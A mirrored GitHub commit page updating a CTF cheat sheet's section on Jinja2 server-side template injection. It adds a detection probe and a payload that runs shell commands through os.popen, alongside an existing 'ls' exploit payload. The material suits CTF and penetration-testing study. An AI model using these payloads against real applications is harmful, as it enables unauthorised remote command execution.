mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-22 12:03:03 +00:00
Update Cheat Sheet.md
This commit is contained in:
parent
1d8de3060a
commit
917a58e08a
1 changed files with 3 additions and 0 deletions
|
@ -512,10 +512,13 @@ If we can read log files,we can poison them to get RCE<br />
|
||||||
### SSTI (Server Side Template Injection)
|
### SSTI (Server Side Template Injection)
|
||||||
|
|
||||||
#### Jinja2
|
#### Jinja2
|
||||||
|
To check if it's jinja test`{{7*'7'}}` this would return 7777
|
||||||
|
|
||||||
Check for `{{4*4}}` on the url `http://IP/{{4*4}}` if it returns "16" as a result it is vulnerable to SSTI <br/>
|
Check for `{{4*4}}` on the url `http://IP/{{4*4}}` if it returns "16" as a result it is vulnerable to SSTI <br/>
|
||||||
|
|
||||||
|
|
||||||
|
`{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}`
|
||||||
|
|
||||||
**Exploit**
|
**Exploit**
|
||||||
`{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}`
|
`{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}`
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue